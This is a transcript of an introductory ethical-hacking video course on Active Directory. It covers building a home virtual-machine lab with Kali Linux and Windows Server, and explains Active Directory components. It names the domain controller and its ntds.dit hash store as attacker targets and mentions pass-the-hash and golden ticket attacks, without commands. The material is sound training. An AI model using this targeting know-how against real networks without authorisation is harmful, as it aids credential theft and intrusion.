Transcript for:
Active Directory Hacking for Beginners

What's up, YouTube! Welcome to this course on Active Directory hacking for beginners. My name is Heath Adams and I'm going to be your instructor for the entirety of this course. Now, this course was an addition to our Practical Ethical Hacking course, and our Practical Ethical Hacking course is a 25-hour course that includes a lot of material, and we just ended up revamping the entire Active Directory section of this course. So as always, when we do a revamp, we release the older material for free, so you can come in here and look at what this course has to offer. This is part of our All-Access plan, so if you want to check out this course or any of the other material, you're welcome to see a lot of it on our YouTube channel, but we have all the up-to-date material and everything else here on our All-Access pass and within this course. So if you came and checked out the All-Access pass, just as an example, you do get access to all the courses that we have here. So we have our Practical Ethical Hacking course among all kinds of other hacking courses: we've got Python courses, Rust coding courses, we've got malware analysis, mobile pen testing and hacking, Windows forensics, all different kinds of stuff. We just even added IoT hacking and detection engineering very recently. With that being said, everything taught to you in this course is still relevant. Just because we revamped the material does not mean that this material is not good; otherwise I would not put it on my YouTube channel, nor would I risk that reputation. So I do want you to enjoy this. If you are somebody that is interested in hacking, you can set up a Linux machine, which we'll give you instructions for, and you have some basic knowledge about computers and computer networks, this will be a very, very fun course for you. Now I do want to pitch you on a few things, and that's going to be it for the entirety of the video. You're going to get five hours of material all for free, but I do want to say a couple things before we do get started here. If
you find that you fall in love with Active Directory hacking and you want to learn more, we do have certifications revolving around Active Directory penetration testing and other penetration testing. We've got our PJPT certification, which is our junior penetration tester certification, and then we have our PNPT certification, which is our advanced penetration testing certification. Both of them revolve around Active Directory, and they both require you to actually hack a domain as part of the process. The PJPT is the baby course and it does come with training, including that 25 hours of materials that we just talked about. The PNPT also comes with that 25 hours of materials plus another 25 hours of material, and it's a little bit more advanced, but both of them do come with free retakes. They are your own individual lab and exam environment, they're very stable, and they have great feedback. Don't trust me: go look on Google, go search the internet, search for these exams and you'll find the reviews out there. The other thing I want to point out is, hey, if you're interested in this, we are running a class on September 16th of 2023. That's our next class for Hacking and Defending Active Directory. This is entirely up to date and is great for you if you are interested in hacking, if you're a systems administrator and you just want to learn how to defend your network, or anything like that. Very affordable training here. You have the option to also do our PNPT accelerated program, which is also live. We're running these every month or two, so if you miss out on this one, not a big deal, there will be more opportunities, and hopefully we'll see you in one of these awesome live trainings. I'll put all this in the description below. Now, if you're a YouTuber in today's society, you'll probably be like, "Get on with it, let's go, let's get into the material, I don't got time." I understand. Last thing: if you like this video, please consider subscribing to the channel. We do put out a lot of free content, a lot of course material
like this and a lot of content related to hacking and other cyber security related items, so please do consider subscribing, hit the like button, tell a friend, share with everybody else, leave a comment down below and let us know what you think. And with that out of the way, please enjoy this five-hour course on Active Directory hacking.

All right, so in order to be successful in this course, we are going to be utilizing what is called a virtual machine. Now, virtual machines are known as VMs for short, and a VM is just a machine on top of a machine. To give you an example, I'm actually running this Windows 10 instance that you see here on top of my Windows 10 instance. So here you can see, if I scroll up, that I have a Windows 10 machine. I also have a Linux machine sitting here. If I were to demaximize this, you can see that I'm actually running here a Windows machine in the back (this is my wife and I), and you come through here, we just blow it back up, and we're back inside of our machine. So a virtual machine is just a machine inside of a machine. What we're going to be doing is we're going to be utilizing this to build out labs; that way we don't have to actually have a bunch of hardware, we can just use this for our course and run what we need to on top of our own machine. Now, this can get resource intensive, so if you are only utilizing something like eight gigabytes of RAM, then you might have some issues with this, but you can still follow along. When we get into the Active Directory portion you might run into issues if you do not have at least 16 gigabytes of RAM to utilize, but we'll worry about that when we get there. There's still plenty of ways to follow along throughout this whole course. Another thing to note is that I use VMs every single day. This machine that you see here is actually my day-to-day pen testing machine, so I run a Kali Linux instance on top of my Windows machine and utilize that to do penetration testing. So I'm going to demonstrate that to you and how we're going to build out our labs with that, and a lot of us in the industry run through VMs as opposed to running it directly on metal, or on a machine.

So in order to utilize virtual machines, we first need some sort of virtual machine software to play these. There are two different ways that we can do this. If you are on a Windows machine or a Linux machine, you can utilize VMware Workstation Player. Now, if you type in "VMware Workstation Player" in Google, the first one here that says "Download VMware Workstation Player", you just click on that. And if you are in a Mac environment, you're going to be utilizing Oracle VirtualBox, so if you type in "Oracle VirtualBox", you come here and you go to Downloads, and you have your option there as well. So in this course I will be using VMware Workstation Player. I'm going to be running it on top of Windows. If you are using Mac, that is absolutely fine, you're going to be following along just the same; all you need to be able to do is follow the same instructions that I give you and you will be A-okay. So if you scroll down here you can see "Try Workstation Player for Windows" or "Try Workstation Player for Linux". Go ahead and just select Download Now. That should bring up a download, and go ahead and save it. If you're doing VirtualBox, go ahead and download for OS X. I will download the Windows version just so that we can see what that looks like as well, so I'll save both of these. So let's view our downloads, and we've got VMware Workstation Player here. I'm going to go ahead and open this one and we're going to install this, and this will be very point and click. So Next, accept the agreement (possibly give away our first child, yeah), we should go ahead and install the enhanced keyboard driver while we have this, and then we don't need to join any improvement programs or check for product updates, that's okay. We will install the desktop and start menu shortcuts; check your preferences as you like it. I'm just going to install this and this should just finish here in just a second. Okay, then you'll be brought to this screen once everything's done. It should take about a minute or two, and we're going to go ahead and hit Finish, and it's going to want a restart to take effect. You can go ahead and restart your system; I'm going to say no right now.

Let's go ahead and install VirtualBox if you are a Mac user. We'll hit Next here, Next, and Yes, and Install, Accept, and again very point and click with the installation. Select Install on any options that do pop up, and then we can start Oracle VM if we want. Let's go ahead and just start that. This is what Oracle VM looks like. And let's see if we can start VMware Player here even though we need to restart, and this is what VMware Workstation Player looks like. So here you can see that we have virtual machines; we can create new virtual machines, open ones, etc. We'll get into that in the next video. So again, if you are using Windows or Linux, this is probably what your view is going to look like for the rest of the time; if you are using Oracle on a Mac, this is what your view is going to look like. Another side pro tip here is that I am using Workstation Pro, and I might utilize this in some instances throughout the course; in other instances I'll be utilizing Workstation Player. There is not much of a difference, especially in the beginning. When we get into the Active Directory portion, it might actually be worth it for you all to download the VMware Pro trial, because the trial is 30 days and you can utilize that to get through some sections and actually have nice little windows here, to be clean and just have a Pro edition. You can do everything I'm going to show you in the course on the Player; it just is that, if you want to run more than one machine, you'll just have to reopen VMware Workstation Player several times to run multiple machines. But that's okay, it just won't look like this nice clean layout where you can transfer between machines like I can do just here.
So with that being said, let's go ahead and move on to the next video. We're going to be installing Kali Linux onto our VMware Workstation Player.

Now that we've installed VMware or VirtualBox, we need to install Linux. We're going to be using a version of Linux called Kali Linux throughout this course. This version of Linux is a Debian-based distribution which is geared towards ethical hacking and penetration testing, so it's a special version of Linux that allows us to have all the tools in one place, that will allow us to hack without having to download these tools and install them on our own custom Linux distribution; it's all kind of nicely built into one package. So if you go out to Google and you type in "Kali Linux download", you should see this link. I'll put the link in the description below as well, but you should just be able to go to Get Kali right here, and you're going to be presented with a couple of options here. We're going to be using a virtual machine in this course, so we're just going to go ahead and click on this Virtual Machines option, and that's going to take us down just a little bit here. What you're going to do is download the respective version that you need: so if you need VMware, you download VMware; if you're using VirtualBox, go ahead and download the VirtualBox one. Now they have a direct download, which is a 7-Zip, and they also have a torrent if you know how to torrent. What you're going to do is go ahead and download the file that you need, and while you're doing that, if you do choose to download directly, you're also going to need a tool called 7-Zip or a way to unzip this file. So go ahead and start your download, and while it's downloading, let's also go ahead and navigate to 7-Zip. So if you go to Google and you look at 7-Zip, you'll see this page here comes up. You just go to Download, and in here you're going to download the file that is for your respective system. So here I'm using Windows on 64-bit; I would download this executable right here. Now if you're running on Linux, here's where you download for Linux; if you're running on macOS, here's where you download for macOS. Very straightforward. I've already got this installed, but what you need to do is just download this and literally click Next through it and make sure you get it installed. Go ahead and pause the video once that is installed (7-Zip, that is), and once you have the actual Kali image downloaded, go ahead and unpause the video. I'll be here waiting for you.

Okay, so your next step should look something like this. You have your 7-Zip file open, you should see a folder located in there, and the easiest thing is to just drag and drop this. You can also right-click and extract if you know where you want to extract it. I created a folder called Kali; I'm just going to grab this and I'm going to drag it over, and it's going to take a minute here, just a few seconds honestly, to unzip. The file size of this one, at least for the VMware version, is around 11 gigabytes, or 11 gigabytes exactly unzipped, so make sure you have the space on your hard drive in order to do this. Now once you have it unzipped, you can go ahead and just double-click in here. You'll see a bunch of files; if you have VMware installed, you can actually just double-click on this .vmx file and that should open things up for you. I'm just going to show you the other way around doing this as well. So with VMware Workstation Player open, what you're going to want to do is go to Open a Virtual Machine, and in the folder that you have, you should see this .vmx file as well. Again, you could double-click it or you could just open it through this. What's going to happen is it's going to open that file here, and you're going to want to edit this virtual machine's settings. Once you have it loaded, click on Edit virtual machine settings, and in here we're going to want to first change the amount of RAM that we have. Now this is dependent on your system. If you have like eight gigs of RAM, or maybe even 16 gigs of RAM, you might want to try leaving it at 2 at first. I'm going to bump mine up to four gigs, which is 4096, and I have 128 gigs of RAM, so I have more than enough space to allocate for this. But again, if you're on like eight gigs of RAM, probably not the best idea to jack this up beyond two; honestly I would try it at one, maybe two, and see how it works. The other thing you're going to make sure of is that you're running on NAT network, so if you click on Network Adapter, make sure that it says NAT and that's selected. Once that's selected, go ahead and hit OK, and then you're just going to hit Play virtual machine. When it asks you what to do, just say "I copied it". Now from here it's going to take a minute for this to load. You can just let this run through; it'll boot on its own. Once you are presented with the login screen, go ahead and unpause the video, but until then, pause and I'll meet you back when you're at the login screen.

Okay, I'm at the login screen. I'm going to make this a little bit bigger just so we can see, and from here what I'm going to do is I'm just going to type in the username of kali (k-a-l-i) and the password of kali (k-a-l-i), hit Enter, and if you see this screen, congratulations, you have successfully installed Kali Linux and you now have it up and running. In later videos we're going to cover what we're going to be doing and how to use this, and how to use Linux and all this, but for now pat yourself on the back, you've got Linux installed, and we're going to pause here and move on to the next video.

Okay, so this video pertains to some updates we need to make to VirtualBox for quality of life, so if you're not using VirtualBox you can go ahead and skip this video. If you are, buckle in; we just need to do a couple of quick updates and then we should be good for the rest of the course. So go ahead and go out to Google and google "VirtualBox extension pack". What it's going to bring up is just the Downloads page of VirtualBox, so we're going to want to go here, and on this page, if you look kind of towards the middle, you'll see that there is a VirtualBox Extension Pack here. We're going to just click "All supported platforms" and that will automatically download the file that we need. So once that is downloaded (and pause if you need to), go ahead and open VirtualBox, and you can come in here and up at the top we're going to go ahead and click on Preferences, and from here we are interested in Extensions. See Extensions right here? Go ahead and click on that. There's a little plus sign; we're going to go ahead and click on that, and then you should have your downloads right here. So we're going to take the download and just go ahead and install that. Hit Install, read this, give away your firstborn, accept all the terms, and you should be good. Very quick install. Okay, the second thing we need to do is we need to come to the one tab up here above, which is Network. We're gonna go ahead and hit the network button, or this Add button, and we're going to add what is called a NAT Network, okay? And we're going to come in here and we're going to double-click, and you can go ahead and keep these defaults. I'm going to actually change them to 192.168.57.0, because that's what's going to be used through the rest of the course, and that is what the CIDR notation of my Kali machine and my Kioptrix, which you'll see later, etc., all fell into: this 57.0. So we're going to go ahead and keep it on this NAT Network, make sure it supports DHCP, go ahead and just hit OK, hit OK, and then for a machine, and make sure any machine that you use, again, any machine that you use in this course, make sure you set it to NAT Network if you're using VirtualBox. So you can come in here, click on a machine like this mail machine I have here, you can just click on that, Settings, go to Network, and then you can go ahead and just go to NAT Network, all right? And that name right here, you see NatNetwork, that's all we're going to use; that'll automatically set it up. So when you have a Kali machine running later and you have Kioptrix or another box
running, or even when we build out an Active Directory lab, you need to make sure that you're running that NAT Network so that all the machines are on the same subnet. If you don't, you might run into a situation where the same IP comes up for the same machine and then they're conflicting with each other, or you get on different networks and some weird stuff happens. So make sure, again, it's imperative that you're setting that NAT Network for every single machine that you're setting up. So with that said, we're going to go ahead and move on to the next video in this section.

Okay, there's one last thing we need to do in order to get our lab build set up here. We're going to go ahead and open a terminal here in our Kali Linux. For this recording I am on 2023.2. So what we're going to do is install a tool called Pimp My Kali; this is going to allow us to install all the tools necessary for this course. So when we come in here, we're just going to go out to Firefox, and you can just go out to Google, and from within Google all we need to do is just come in here and search "pimp my kali", just like that. You should be brought to this page here where it says pimpmykali, Dewalt-arch. Just click on that, and we're going to go ahead and just go to this Code here and copy the github.com link that you see here, so just click Copy. So what we want to do, I like to put this in the /opt folder, so if we cd over to /opt here and we just come in here, let me check if I've already got it installed. I don't here, which is good. Okay, so we can come here and we can say something like sudo git clone and then we'll just paste this pimpmykali link here, hit Enter, type in your password, which should just be kali, and it will clone this. Once you have it cloned, go ahead and cd into pimpmykali, and from here you will have this script, pimpmykali.sh. All you need to do is run sudo ./pimpmykali.sh, just like that. Okay, from here we're going to hit Enter and it's going to ask you what do you want to run
here. What you're going to run is a New VM Setup, right here, okay? New VM Setup. So you can just hit N on that. I'm not going to run it because I already have this installed; I'm going to hit X to exit here. All you need to do is run that New VM Setup. There will be a few prompts that come up that you have to click through; don't worry about that, just click the defaults for everything and accept, and you should be good to go. Now you have the option from within this tool to have a root user or not a root user. I am not using a root user here; I would recommend not using that as well. So somewhere within here it will ask you, "Hey, do you want to add a root user?" You don't have to worry about that, all right? Everything we're going to do is from within our kali user in this course, so just make sure you get all the tools set up. If you don't do that, then you will have problems when it comes to actually going through all the Active Directory material. So that is it. We're going to go ahead and go from here and jump into our Active Directory hacking stuff, so I'll see you over in the next video.

Welcome to the Active Directory portion of our course. Now, I'm super excited to cover this part of the course because, one, I think it's the most overlooked part of any course that's out there right now (now some courses are starting to touch on it, but a lot of them are failing to do so); two, as you're going to find out, it's one of the most important items to learn when it comes to ethical hacking; and three, a little bit biased, but internal slash Active Directory pen testing is by far my favorite. It goes so deep, there's so many possibilities, and these questions that are going to come up, this building a lab, everything that we're going to do in this section of the course is going to come up in an interview, and you're going to be ready to nail those sections because you're going to have a lot of these answers down. So I'm very, very excited to start covering this. So before we can do that, I do have a
little bit of Death by PowerPoint. We're probably gonna do two to three videos; we'll keep them as short as possible, but you have to understand what Active Directory is before we can go out and build Active Directory and then attack Active Directory. So let's get started.

So what is Active Directory? Well, you could think of Active Directory as like a phone book, okay? And this phone book stores all kinds of information. These pieces of information you can think of as objects, and that's something like a computer or a user or a printer. All these objects are stored in this phone book, and we call these directory services, and Active Directory is used by Windows. Now, chances are if you've ever worked in a work environment, you've probably used Active Directory, and we'll cover that a little bit on the next slide as well. Think about logging in at your computer: you get to work, you log in at your computer, you probably have, you know, a username and a password, and you log in with that username and password. But say maybe there's another computer, either in a different building or just in a different location, or maybe you have a laptop, and you go to use that computer and you use the same username and password, and then when you sign into your email, you use the same username and password. It's because you're using something called Active Directory, so you can have just this one username and password and you can authenticate around the network using these credentials. Now, this authentication is going to be using something called Kerberos, and we'll talk about that a little bit later in the course, and specifically how we can attack it, but for now just know that authentication on Windows-based devices using Active Directory uses something called Kerberos, and they use tickets.

So why Active Directory? Why is it so important? Well, Active Directory is the most commonly used identity management service in the world. Now, 95% of the Fortune 1000 companies use it in their networks. 95%! So let me break this
down for you: when we do internal assessments, when we do internal pen tests, never have I ever had an environment that I pen tested against that was not Active Directory. This is so important when it comes to interviewing, when it comes to real-life experience; this is the bread and butter. Everything, as I said before, all these courses out there, they teach external; not a lot teach internal. This is really where the money is made, so being able to exploit an environment from the inside is super, super important. So again, with Active Directory, the nice thing too is we can exploit it without there ever being an exploit available to us, so there doesn't have to be a patchable exploit in the environment. We could take advantage of what Active Directory does by default, what is considered in some cases a feature, and exploit that. So we can abuse features, trusts, components; there's so many different things in Active Directory that we can abuse because they're features. That's a really nice thing as well. So it comes down, as you're going to see when we talk about defenses, it comes down a lot to policy, and a lot of policies are just not in place in environments, and internal assessments can be bloodbaths. When I talked a few videos ago about these external networks and them being fortified, and that you're really not going to find your way in that easily, and then the internal network being like the inside of a house: you fortify the external, you fortify the outside of your house, but you really don't think about the locks on the inside, and that's what happens a lot of times with Active Directory. It can get messy very fast. So it's important to have this knowledge, it's important to understand how to attack it and what some of the common attacks are, and it's important to know what Active Directory is as a big overview. So we're going to cover what Active Directory is as an overview, and then we're going to dive into building our lab, and we'll dive into attacking our lab. It's going to be super, super fun. This
is my favorite part of the course. So let's go ahead and move into the next video; we're going to start talking about physical Active Directory components.

So for this video and the next video, we're going to talk about the physical components of Active Directory, and then we're going to talk about the logical components of Active Directory. So I'm only going to introduce concepts and ideas that pertain to this course. On the logical side I am going to introduce some concepts and ideas that are out of scope for the course but I think are still important, but for the physical side I'm going to limit it to what's in scope, as to not confuse you or make things any more complicated, because Active Directory can run really deep really fast. So we're going to give a high-level overview and then it'll make a lot more sense once we start building things out. So let's talk about two very important physical Active Directory components. The very, very most important Active Directory component is what is called a domain controller. So if you've never heard of a domain controller, that is the head honcho of all the servers, right? When you set up Active Directory, you have what is called a domain controller. Now the domain controller has a lot of features that it provides and does for the environment. It hosts what is called the Active Directory Domain Services directory store, meaning it hosts your phone book. Remember we talked about it being a phone book; it has all the information on the users, the computers, what printers are in the network, etc. It knows everything. On top of this, it's providing authentication and authorization, so going back to the last video when we talked about Kerberos, it's doing that at the domain controller level. And if we're in what's called a forest, or in a domain where we have a parent-child situation, which we're going to talk about in the logical side of things, it does replication, so that way for the other forests or other domains, when you make an update to one item in one
domain controller, it updates across the board. Now we'll talk about that here in just a second, but also we have administrative access with the domain controller; that is to manage user accounts and network resources. As you're going to see when we build our domain controller, what we do is we go in there, and this is where we can add users, this is where we can add our computers, where we can add policies, we can do all different sorts of things, and we do it at the domain controller level. So when we talk about the domain controller, again, it's the head honcho, it's the top dog. When we attack an internal network, it's very, very bad if we can compromise your domain controller, because that means we can compromise the whole network potentially. So depending on how big the network is, if it's just one domain and we compromise the domain controller, we've compromised everything, okay? So this is one of the top targets when you're doing an internal assessment, though it's not the only target, and I should note: do not get your eyes set on just doing domain controller compromise and that being it. When it comes to Active Directory pen testing or internal pen testing, there's other information that clients might want as well. Think about potentially PII, or personally identifiable information, especially if it's related to like Social Security numbers or sensitive information about people; think about any kind of credit card information that might be obtained; think about any kind of proprietary information that you might be able to obtain as well. So don't just go for domain admin or compromising the domain controller; think beyond that. Think what could you do as an attacker that would be really damaging to a client.

Now from here, let's also talk about the Active Directory data store. So the big takeaway from the Active Directory data store is that it holds this file called the ntds.dit (d-i-t), okay? And this file is very, very sensitive. Now typically when you compromise a domain controller, you want to grab
this file. Why do we want to grab this file? Well, it contains everything that is stored in Active Directory data; that means all the users, the objects, the groups, etc. More importantly, it contains password hashes for all users in that domain. So when you compromise that domain controller and then you go get the ntds.dit file, guess what, you've got all the password hashes. Doesn't mean you have all the passwords, but you have the hashes. You can take them offline and try to crack them, you can attempt pass-the-hash attacks, you can attempt golden ticket attacks with the hash, and I know you might not know what all these are right now, but we're going to see why compromising this ntds file will lead to amazing things as an attacker for us when we get into the attacking side of things. So that's all I want you to take away from this. I want you to take away these two components, a domain controller and the data store, because the domain controller is one of our primary targets as an attacker. That is the big cheese, right? We want to attack it, we want to compromise it, because that's where all the data is stored, that's what's doing our authentication, that is where everything about anything is there, and we're going to live inside of the domain controller for a while. When we're doing our lab build, we set everything up, we set up our policies; you're going to get a good feel for what exactly you can do on a domain controller. And then know the data store: the data store has this ntds file, and that file includes all information from Active Directory data, including password hashes. Big, big, big thing to remember. So that's it. From here we're going to talk quickly about logical items, and then we're going to move on to building our lab, which is going to be super exciting.

All right, let's talk through the logical components of Active Directory. You're going to hear these terms over and over again, so I'm going to walk you through them briefly, and then you'll hear them as we go through the course, and
it's just good to have that familiarity with the names and kind of what they mean behind it. So up first is what is called the Active Directory schema, and you can think of a schema as a rule book or a blueprint. Basically what it does is it contains definitions of every object that can be created in Active Directory. So you see here it just says it enforces rules regarding object creation and configuration; that's it. When you hear "the schema," all you've got to think about is the rule book. You don't have to think too much more complex about that; it just enforces rules about object creation. More importantly is what are called domains. So domains are what is used to group things together, so we can group our objects together in a single organization. And you can see here that we've got a single domain, this contoso.com (all these sources are provided by Microsoft Virtual Academy), and it's just one domain. And if you have, like, a small business, think of a small business: you might just have one domain that you're on, and this one domain has all the users, computers, every object inside of it, because all you need is one domain. So we have this one domain, and it functions like a domain controller, and we can see down here in the description that there are administrative boundaries for applying policies, and they are authentication, authorization. And this looks very familiar to what a domain controller was, except now we're just managing it all in what is called a domain. So when you see like a .com or .org, you think of that as a domain; not very different when we are building it out in our network. We also have what are called trees. Now trees are a group of domains, and they're kind of in this hierarchy. So you see again we have this example of this contoso.com; well, what if contoso.com is the big namesake, and then we have two child domains? So we've got a parent domain, and then we have a child domain, or two child domains, and we have a division in North America, so we've got
na.contoso.com, and then we have a European one, so we have emea.contoso.com. So when we have trees, we have this parent and then we've got these children when it comes to domains, and they have what is called a trust with them that is two-way transitive, and we'll talk about trust here in just a little bit. But just know that you have the parent and then you have the children, and they share namespace and they share some trust between them. And then we have what is called a forest. Now forests are just a collection of these trees. So if we have one tree and it's maybe contoso, and then you have another tree and maybe it's a different business name, but they link together one way or another, and you can have different sorts of trusts between these forests. So we'll take a look at that again in just a second, but just know that these build up and they stack as they get bigger, and logically we start with the domain, and then we have a tree, and then we have a forest, okay? And for the sake of this course, we're only going to be working with a domain. And a lot of times, when you see even more advanced Active Directory courses, mostly you're going to be working with trees, where you have these child domains and you might try to escalate into a parent domain. Hardly ever do you see forests, but it's still important to know about them. Now inside of Active Directory there are what are called organizational units, and you'll hear me refer to them as OUs; that's the common terminology, an OU. And these are just containers; they are containers for your users, your computers, your groups, and you're going to see this once we start building out our Active Directory components. You're going to see me go in, and we're going to set up some different OUs, and have our users in one OU, we'll have our groups in their own OU, etc. So you'll see what they are, but as of right now just think of OUs as organizational units, okay? And then we have trusts. Now trusts are how we have access between
resources. Now you can see that there is directional trust and transitive trust. So if you have directional trust, we have to have trust from one domain to the other domain, okay? So it flows from a trusting domain to a trusted domain. Now if we have transitive trust, then we have a trusting domain and a trusted domain, but it also trusts everything that that domain trusts. So if there's other trees, or if it's in a forest, then it trusts everything that trickles down, and you can see in the image here where we have two trusts, but then it's trusting everything that other domains are trusting as well. So a trust is just a way for users to have access to certain resources that might exist in another domain. And lastly we have objects. So objects are what's going to be inside of our OUs, our organizational units; we're going to have these different objects. So a user can be an object, a group can be an object, a computer, printer, shared folders, you see all these things in this list; they can be objects. So let's break this all down one more time. We have domains, and domains are used to group and manage objects in an organization; that's primarily what we're going to be working with in this course. If you have multiple domains, we have what's called a tree: you might have a parent domain, and then you might have the child domains. And then when you have multiple sets of trees, you're starting to build out a forest, okay? Now inside of these domains, or these trees, these forests, are what's called these OUs, these organizational units, and these organizational units consist of these objects, all right? And then the last thing to remember is across forests or across domains we have what are called trusts, and these trusts can be directional, meaning that one domain trusts another domain, or they could be transitive, meaning one domain trusts another domain and then trusts everything else that that domain also trusts, okay? So, high-level overview; take good notes on this. If you need to go back and watch it
one more time, but you're going to see this over and over and over, especially domains and organizational units and objects. We'll talk about trusts again throughout the course, and we'll give some ideas about trees later on in the course as well, though we won't actually be exploiting them. So for this course, the big takeaways are domains, organizational units, and objects, and remember what trusts are as well. But it does not hurt to know all these things just to boost your Active Directory knowledge, especially for an interview if it comes up. So that is it. Now we're going to be moving on into our lab building, and this is where the fun really begins; we're done with the death by PowerPoint. So I'll catch you over in the next video where we start to build out our Active Directory lab.

Welcome to the lab overview. So before we build our lab, there are a few things that I wanted to cover, and that is what the lab is going to look like. So our lab is going to consist of one Windows Server 2019 and then two Windows 10 Enterprise machines. If we think about this, and we think about this in a virtualized environment, we have some minimum requirements we're going to have to use. For one, when we run ISOs or we run machines, we need disk space; on top of that, we need RAM. And to build this lab effectively, we need about 60 gigabytes of disk space and 16 gigabytes of RAM. I am utilizing much more than that in this course; I'm using 32 gigabytes of RAM when I do this. So here's how it should work: we're going to have a Kali machine, our attack machine, and then we're going to have these three other machines. Now you might utilize two gigabytes of RAM for each, so two gigs on Kali, two gigs on the Windows server, and then two gigs on each Windows 10 Enterprise machine. That will give you about eight gigs of RAM usage, not including anything else that you're running, meaning your base OS or any of that. So please keep in mind that you need at least 16 gigabytes of RAM for this course to be effective. If you have more
than that, that's great; you can start assigning maybe like four gigs, if you want, to each machine. I'm only going to assign two, just to keep it to the bare minimum on speed requirements. And if you do not meet the requirements, which I completely understand, not everybody has 16 gigabytes of RAM in their computer, right? That's okay. Please follow along, take notes, take screenshots, download the tools, play around with them and understand them. There's still going to be examples with some Hack The Box machines that we encounter later on in the course that are going to allow us to utilize some of these attacks, and you can play around with those, and you still can understand what's going on even if you can't do it hands-on fully. I understand this is a limitation, but this is also a good time, if you've never built a lab and you do have these requirements, to build out this lab and fully understand it. If you need something, you can go out and purchase a cheap server; they have a bunch of those on eBay, and build our ISOs to these requirements as well. But for me, I'm just running with enough disk space and enough RAM to actually be functional. And again, if you don't have the requirements, do not stress out about it. There are plenty of people who have done similar builds with me before, and they didn't have the requirements, and they still learned a lot. So please just consume the information that is about to be presented to you, and understand what we're building, why we're building it, what we're attacking and why we're attacking it, and you're going to kill it in your job interview, I promise you. So from here, let's go ahead and start downloading the files that we need, and let's start building out this lab.

Before we start building our lab, I wanted to add an alternative, and this is going to be building the lab in the cloud using Azure. Now this article from Cameron Bill Grammy is fantastic; I'm going to link it in the resources and I'm going to direct you to it. This should be an alternative if and
only if you do not have the computational resources to build the lab out in your own home environment. Now, things to be said: first and foremost, this will require a credit card. Using Azure requires resources out in the cloud that cost money; make sure that you have a credit card and you're willing to spend some money to build out this lab. This could be an alternative if you do not have a computer, or you can't afford the resources, say extra RAM or CPU, etc. Building out an Azure lab like this is going to be relatively cheap comparatively, and you get, I believe at the time of this recording, two hundred dollars in credits when you first sign up for Azure. The second thing to point out is we will not support this lab if you build it. So we have technical support; we are not going to support this lab. This is just an alternative if you want to go ahead and look into another option, and you want to follow along with building the lab and you do not have the resources otherwise. I think this is a great lesson on how to build an attack lab in Azure, how to build out Active Directory, etc. There is a lot of detail here; I can scroll for quite a while, and it is the exact lab build that we use in the course. He just took it and he went and made it in Azure, in the cloud. I think this is fantastic, I think it's awesome, and I think it should be pointed out as an alternate resource. But again, it costs money and we will not support any sort of technical troubleshooting for this, so take your own risk if you're going to go down this route, but it is a great alternative if you so choose.

All right, let's get started with building our Active Directory lab. So go ahead and go out to Google and search for "Microsoft Evaluation Center." So we're going to search for that, and the very first link that comes up, this Microsoft Evaluation Center, that's what I want you to go ahead and open. When you're there, if we scroll down just a bit, we have "check out the latest products." So what we are after here is,
we're after Windows. Let's go ahead and click Windows, and we're going to right-click on Windows 10 Enterprise and just open that in a new tab, and we also want Windows Server. So we're going to click on Windows Server and we're going to grab Windows Server 2019. So we're going to right-click, open in a new tab, and now we should have access to both Windows 10 and Windows Server. Now the Windows 10 license is good for 90 days. Do not worry about it if you go over the 90 days; it's just going to give you a little warning in the bottom saying your license is expired. I have a lab right now that's built off an expired license that I use just for practicing attacks, and it has been probably over a year since I have used the lab with the evaluation licenses, and it's fine. So what we're going to do is we're going to download both of these, and we're going to download the Enterprise ISO. So I'm going to go ahead and just hit Continue, and then I'm going to hit Continue here on ISO. So we're going to download the ISO for Windows Server 2019, and it's going to ask you for your information. Go ahead and fill this information out and get your file downloaded. So once you enter in your information (it does not have to be true information, I should add), you will get to this section here for Windows 10 Enterprise that says do you want 32-bit or 64-bit. Go ahead and select 64-bit, and then select your language; let's go ahead and choose English, and then Download. And it's going to download a file; this file is 4.6 gigabytes for me, so make sure you have space wherever you're installing it. So I'm going to go ahead and hit Save and let that download. With the Windows Server evaluation, all it's going to ask for is your language; we're just going to go ahead and select English and select Download as well, and this is also 4.9 gigabytes, same range here. So I'm going to go ahead and save that, and now these are going to download. So these are big file sizes; it's taking a little bit of time here, and I'm on gig fiber, so go ahead and
let your files download, and then go ahead and meet me in the next video where we start installing Windows Server 2019.

So let's first install Windows Server 2019, which is going to be our domain controller. So let's go ahead and click on Create a New Virtual Machine, and yes, you are reading this correctly: Hannah Montana does have a version of Linux that we were playing around with on a stream, so that's the last thing that I installed on this computer. Go ahead and go to Browse, and then here go ahead and select your ISO. So I'm selecting my server eval ISO right here; go ahead and double-click that, and it says Windows Server 2016 is detected. Not exactly accurate, but that's okay. We're going to go ahead and hit Next, and it says what do you want to install, 2016 Datacenter or Standard; we're going to go ahead and just say Standard. And now the rest of this you can go ahead and leave blank. We don't need a product key, because this is eval, and you won't need a password either. Go ahead and select Next. It's going to prompt you and say you didn't enter a product key; we're going to say yes, we want to continue. And then go ahead and choose where you want this virtual machine to be stored; I'm going to go ahead and just let this store on my actual C drive here, and I'm going to hit Next. And then it's going to ask you how much file size you want for this, so I'm going to go ahead and just say 60 gigabytes and split the disk into multiple files. This is not going to take up 60 gigs; it's probably going to take up somewhere around 10 to 20. Once we have all three machines, we'll probably take up 60 gigs in total. So we're just going to go ahead and hit Next on this, and then at this last step here, find "Power on this virtual machine after creation" and make sure that's unchecked, and then hit Finish. And now we have our Windows Server 2016.
We're going to go ahead and select Edit Virtual Machine Settings, and in here we have this floppy drive. We want to make sure this floppy drive is removed. You see this "using auto install"? If we don't remove this, it's going to try to install this weird file; it's going to ask for a key; it's just not going to work for us. So let's go ahead and just remove that completely. Now we're going to use a NAT network for this, so go ahead and just say "used to share the host's IP address"; we'll select NAT. On the memory side, go ahead and select two gigs of memory. If you have it, you could select a little bit more; say you're running 32 gigs, for example, you could select more, but go ahead and just use your two gigs.

So let's actually pause here with a small update. Now I said two gigs was fine, and it probably is, but we've noticed with our student lab builds that two gigabytes can tend to slow things down just a bit when we're installing and doing the setup. So we highly, highly recommend that you set this to four gigs here, and then if you need to revert because you don't have as much RAM, revert back to two gigs once you have the domain controller installed. And the same goes for setting up the user machines in the next video: use four gigs, then you can turn it off, set it to two gigs, and then reboot the machine.

And we're going to go ahead and just say OK here. Now from here, go ahead and select Play Virtual Machine, and have your fingers ready. Click in it, and it's going to say "press any key." Press any key, so make sure you do it really quick and get it to boot; otherwise it's going to go into this funky thing and it's not going to work for you. So make sure you press any key. This is going to spin up really quick, and then we're going to go ahead and enter some information here. So your install should look like this: it should say Windows Server 2019, and then go ahead and select your languages. I'm going to be using English (United States) for all of this, and I'm going to hit Next, and then I'm going to select
